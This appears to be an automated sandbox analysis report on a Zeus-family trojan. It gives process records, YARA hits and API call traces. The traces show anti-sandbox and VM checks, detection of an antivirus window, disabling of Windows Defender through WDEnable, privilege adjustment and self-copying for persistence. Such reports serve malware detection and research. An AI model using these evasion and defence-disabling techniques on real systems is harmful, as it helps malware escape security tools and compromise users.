                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1732800865.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000022.00000002.1733188359.0000000002F20000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:36
                                                                                                                                                                                                          Start time:04:53:10
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.1734272872.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000024.00000002.1733713050.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                          Target ID:38
                                                                                                                                                                                                          Start time:04:53:11
                                                                                                                                                                                                          Start date:08/09/2024
                                                                                                                                                                                                          Path:C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\mQMdNJFuyLXMxxhZAODcSZPAQHJEgvJZNIoPYtdhvocEfUAnTkZFk\nFjEHtbDTFjy.exe"
                                                                                                                                                                                                          Imagebase:0x140000
                                                                                                                                                                                                          File size:140'800 bytes
                                                                                                                                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1740627207.0000000002560000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          • Rule: Windows_Trojan_Zeus_e51c60d7, Description: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., Source: 00000026.00000002.1741539824.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(user32.dll), ref: 00402D41
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D55
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                              • Part of subcall function 00403A20: RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                              • Part of subcall function 00403A20: CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                              • Part of subcall function 00403A20: strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                              • Part of subcall function 00403A20: GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D66
                                                                                                                                                                                                            • FindWindowA.USER32(____AVP.Root,00000000), ref: 00402D7D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402D89
                                                                                                                                                                                                            • PostMessageA.USER32(00000000,00000466,00010001,00000000), ref: 00402D9B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 00402DBB
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402DCC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Namestrstr$ExitFileModuleProcessUser$AdminCharCloseCountDirectoryFindInformationLibraryLoadMessageOpenPostQuerySystemTickUpperValueVolumeWindowWindows
                                                                                                                                                                                                            • String ID: IsWow64Process$PnSw$Wed Jul 6 06:49:26 20112$\apppatch\$____AVP.Root$explorer.exe$kernel32.dll$user32.dll$winlogon.exe
                                                                                                                                                                                                            • API String ID: 3353599405-1027215798
                                                                                                                                                                                                            • Opcode ID: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                            • Instruction ID: a3246fa232e6b5ad05535f44e20517c4174ab377f4a657e755d7089196f7c676
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ea638118beff029f17ac0200bc0c4ed4c7c13e890bf55d737871981aa78e3ae
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 085161B0640212ABDB1077B1DF0EB5B3668AF90785F10413ABB05F51E1DBFC9D818AAD
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000002,HARDWARE\DESCRIPTION\System,00000000,00000101,?), ref: 00403A60
                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(80000002,SystemBiosVersion,00000000,00000007,?,00000400), ref: 00403A85
                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?), ref: 00403A93
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00403A9F
                                                                                                                                                                                                            • GetUserNameA.ADVAPI32(?,00000104), ref: 00403AD9
                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00403AE6
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403AFE
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B17
                                                                                                                                                                                                            • strstr.MSVCRT ref: 00403B30
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00403B49
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403B6D
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403BA7
                                                                                                                                                                                                            • StrStrIA.KERNELBASE(?,\sand-box\), ref: 00403BBF
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\cwsandbox\), ref: 00403BD1
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,\sandbox\), ref: 00403BE3
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: strstr$CloseName$CharDirectoryFileInformationModuleOpenQuerySystemUpperUserValueVolumeWindows
                                                                                                                                                                                                            • String ID: E$HARDWARE\DESCRIPTION\System$M$MALNETVM$Q$SANDBOX$SystemBiosVersion$U$VIRUSCLONE$\cwsandbox\$\sand-box\$\sandbox\
                                                                                                                                                                                                            • API String ID: 1431998568-3499098167
                                                                                                                                                                                                            • Opcode ID: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                            • Instruction ID: bae6937ecf4d77d63e68da0d133f8e08c9265e2213eddde9df9132157c3c9a9d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3caa7bba4dd23b12010071394e2641878e1989dd699c05cb0f3a9ea1e275d5a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A841B8B1944218ABDB20DB54CD89FDF7B7C9B84705F1440AAE704B61C0D779AB448F98
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025
                                                                                                                                                                                                            • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                            • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                            • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                            • String ID: G,@
                                                                                                                                                                                                            • API String ID: 213124939-3313068137
                                                                                                                                                                                                            • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040211E
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402134
                                                                                                                                                                                                            • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040214A
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402157
                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402166
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040217B
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                            • String ID: MpClient.dll$WDEnable$Windows Defender$v-@
                                                                                                                                                                                                            • API String ID: 1010965793-1794910726
                                                                                                                                                                                                            • Opcode ID: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction ID: 6149f717096a9febd0c21d278ea6f34184d08bed9f30ffe58492fd99f82aed82
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a8801f81893ad2c186c2148835d49196fca5eda48d8657e7ad32c24086763b8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5A11D5B2940318BFD7219FA4DD49FAEB76CEB48710F00037AF705B22C0D27C4A418AA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401150: CreateFileA.KERNELBASE(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                              • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                              • Part of subcall function 00401150: RtlAllocateHeap.NTDLL(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                              • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                              • Part of subcall function 00401150: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                              • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                              • Part of subcall function 00401150: ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                              • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                              • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                              • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$File$Process$FreeValidate$AddressAllocateCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                            • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                            • API String ID: 3168189189-905597979
                                                                                                                                                                                                            • Opcode ID: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction ID: 64d0ad1f4564684b16137518c26293c6cc216b866d3c13d6df455aa1ddd35d97
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2010ef54e731929bdeef478eef36219a5a0ac2089432c3df2103351bfe7421e8
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 00118271600304ABD724ABB69D49F9B7BA89F85755F044136FB09F62E1EB38DD00CA68
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CoInitializeEx.OLE32(00000000,00000002), ref: 0040269F
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004026CD
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(?), ref: 004026E0
                                                                                                                                                                                                            • SysAllocString.OLEAUT32(Windows Explorer), ref: 004026F2
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E70,00000000,00004401,00404E80,?), ref: 0040271B
                                                                                                                                                                                                            • CoCreateInstance.OLE32(00404E90,00000000,00004401,00404EA0,?), ref: 004027CF
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00402DB5), ref: 0040285D
                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 00402864
                                                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004028BE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                            • String ID: Windows Explorer
                                                                                                                                                                                                            • API String ID: 1140695583-228612681
                                                                                                                                                                                                            • Opcode ID: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction ID: b52a01207190e4a30f96b10a649eeabca6697c1dd3b0d782d0755018a236c0da
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4af7e25e07fe91e1fd00f1fb65f3c817a061b1e1e25a39bc6d6eebae34654fce
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2E714175A006169FCB10EB99CD88DAFB7B9AF88300B24816AE504F73D0D7B5ED42CB54
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                            • AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Token$CurrentOpenProcessThread$AdjustChangeCloseErrorFindLastLookupNotificationPrivilegePrivilegesValue
                                                                                                                                                                                                            • String ID: SeSecurityPrivilege
                                                                                                                                                                                                            • API String ID: 348569255-2333288578
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004023F6
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 00402416
                                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040241C
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040243A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040243D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                            • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                            • API String ID: 3225117150-898603304
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C,00000000,00000000,76A8DB30), ref: 00402AAB
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00402AC3
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 00402AE4
                                                                                                                                                                                                            • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 00402AFC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402B3D
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402B4D
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402B5E
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00402B96
                                                                                                                                                                                                              • Part of subcall function 00401390: GetTickCount.KERNEL32 ref: 0040139B
                                                                                                                                                                                                              • Part of subcall function 00401390: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BA2,00000000), ref: 004013AC
                                                                                                                                                                                                              • Part of subcall function 00401390: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004013BC
                                                                                                                                                                                                              • Part of subcall function 00401420: GetTickCount.KERNEL32 ref: 0040144A
                                                                                                                                                                                                              • Part of subcall function 00401420: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402BAE,-00000006,00000000), ref: 00401457
                                                                                                                                                                                                              • Part of subcall function 00401420: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401463
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 00402C10
                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00402C28
                                                                                                                                                                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 00402C5A
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C85
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00402C88
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402C94
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00402C97
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402CB6
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402CC5
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402CD5
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(?), ref: 00402CE6
                                                                                                                                                                                                            • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D04
                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00402D15
                                                                                                                                                                                                            • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20111), ref: 00402D20
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
